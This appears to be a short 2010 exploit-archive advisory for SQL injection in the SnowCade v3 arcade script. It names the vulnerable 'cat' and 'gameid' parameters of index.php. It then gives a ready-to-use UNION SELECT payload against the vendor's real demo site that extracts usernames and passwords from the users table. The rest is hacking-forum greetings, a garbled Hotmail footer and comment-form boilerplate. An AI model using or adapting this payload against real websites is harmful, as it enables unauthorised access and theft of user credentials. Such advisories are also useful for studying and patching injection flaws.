SnowCade v3 SQL Injection Vulnerability

2010-06-20 / 2010-06-21

Credit: ahwak2000

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

/*
[-] SnowCade v3 SQL Injection Vulnerability [-]

---Date     : 2010-06-19
---Author : ahwak2000
---Email   :  z.u5[at]hotmail.com
[-] Script Info [-]
---Home   : http://www.arcadecreate.com/

---Demo   : http://www.arcadecreate.com/demo/v3/snowcade/index.php

[-] Vulnerability [-]

http://site.com/[path]/index.php?action=browse&cat=[SQL INj]

http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]

http://site.com/[path]/index.php?action=browse&cat=[SQL INj]

[-] DEM0[-]
http://www.arcadecreate.com/demo/v3/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--

[-] Greetz to [-]
 
To All Friends in V4-team Forums And pc.pirate
*/

_________________________________________________________________
????? ?????????? ??????? ????? ?????. ???? ??? Windows Live Hotmail ??????.
https://signup.live.com/signup.aspx?id=60969

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

SnowCade v3 SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

SnowCade v3 SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.